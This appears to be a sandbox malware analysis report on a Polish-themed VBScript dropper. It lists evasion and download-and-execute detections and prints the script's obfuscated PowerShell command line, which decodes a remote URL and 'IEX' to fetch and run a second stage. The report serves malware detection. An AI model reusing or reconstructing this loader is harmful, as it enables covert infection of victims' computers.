Edit tour
Windows
Analysis Report
MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- wscript.exe (PID: 6164 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\MPOL_ 74836582 Z apytanie P otwierdzen ie 003424. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 812 cmdline:
cmd.exe /c ping aszz zw_6777.67 77.6777.67 7e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 4052 cmdline:
ping aszzz w_6777.677 7.6777.677 e MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 7344 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Svigag tige dimer ised Opret telsesdoku menter Rhi nodynia Ze tas #>;$De siringly14 7='Grunted ';<#Iltele grammet He mispheral Acromelalg ia Deboshe d Corrupti bleness #> ;$Masonica lly=$Nerve patientens +$host.UI; If ($Mason ically) {$ Laengst++; }function Jus($Hovek atalogers) {$Sanering smodent=$S krmplante+ $Hovekatal ogers.'Len gth'-$Laen gst; for( $Isttes=4; $Isttes -l t $Sanerin gsmodent;$ Isttes+=5) {$Skovsvin erier++;$S nrer210+=$ Hovekatalo gers[$Istt es];$Skueb rdene='Kun demdets';} $Snrer210; }function Hyperroman ticism140( $Regelfast sttelsers) { & ($And antinoer) ($Regelfas tsttelsers );}$Courte zanry=Jus ' owlMBov. o Unlz R n iFluslDias l AnoaDay /Non. ';$C ourtezanry +=Jus ' ad 5Thro. Ska 0 Adr Dece (Is.aWRota iInvanRad. dBracoGawa w M,rsFren Ch,pNOnds T,til Rose 1Skr,0Ungd . B t0Ig,i ;Str ParW NoneiTra n Far,6Krem4 S,je; Ber Mot x Ka.6 S,at4Ha,l; Cykl Baghr Afstv itr: Hol1 All3 it1 or.Fu gl0 ava)St ri FyriGSt egeGenocOm gakIgnao r re/As p2De pr0 Mis1ca lc0 Spo0Pe nk1side0 E nf1Retr We apFPropiLa serRemoe,k olfLiv,oBa rbxBlu /Un f.1Pol,3 U nf1utrn. m b0Bade ';$ Retspraksi sens=Jus ' KariU,rivs PhyteLet.r tana-Unfra StygSmmee BorgNTil T Blac ';$Mi ljforandri ngers=Jus 'LegahUniv tenketKloa pStats boo :Recu/Ergo /gae,gsolb oHyd vFolk aHumel Rat lMahocFati .SerpoPaas rPitagBibe /R gnrBega e ird Defn Sta iSamfn To lgEners IndbF rsl .tatt .yde Tr lr idtn M,dheCervs oma.Sou.a AsylsCan i Ostr ';$Cr oises=Jus ' ,kr>Nerv ';$Andant inoer=Jus ' ResIAnam ESo iXViva ';$Befogg ing='Itali ana';$Reca rbon='\Ark aiserings. Slg';Hyper romanticis m140 (Jus 'Forh$ emp gPr,clAg e ofrueBOms. AM.nolOver :NiveA pid nVagta isp CThyrl Dis iFrihsSegr iOu,dsKnu, 1Vrkb4E gl 7,arv=A ab $ s eE.uni NCog VAnt :Ae iaForf pTeraPKer dNoncaCont tWienAluge +Arv,$,amb rStteeExcu c issAkont r S,kb May oWeasNStub ');Hyperr omanticism 140 (Jus ' hec$DefeG Ln Lr ckO NonaB Fora Te.eLBrn : GenoAGrafu AlleT MulO Sa.se Co.T SvrtRuboE Bra= P s$ UnsoM Shai Eme.LStyrj NulsfAarro M,mrdoryA Syndn InbD AnlirSpe,i NasaN KomG VodeyustR InflS Spy. Sprjs xaP SmrlVa dIB isetSub (W ell$ PeacJ eweRRetso S,di NitsE sseEUpshsS ydv)Arb ') ;Hyperroma nticism140 (Jus 'Ndp [Cyc n.nd iEOothT S, j.Ger.ssko vEUd frRes pvProhI U fCfedteSal vPPhylOSan .i Op.nS.o rT antmSpi laFjolN la uaR liGUpr ue ChoRTul i]W nn:t.e d:Ansts he eBageCissk U MyorHelt I rustUrot yUdviPSc d r.ygaOUnds tOro.O Cry C idO talL Hove Da a= Steg Kaff[ H moNBesgE TutotBird. ebySGerfE Uni CSweau DyserOverI HomoT Picy ,efrpLnkor UdstoMaant BiltORomaC afs.oC hol CondTKavey KolPRdtue S,e]Tui : Hypo:smalT amucLKo ps N n1Nond2 Dep ');$M iljforandr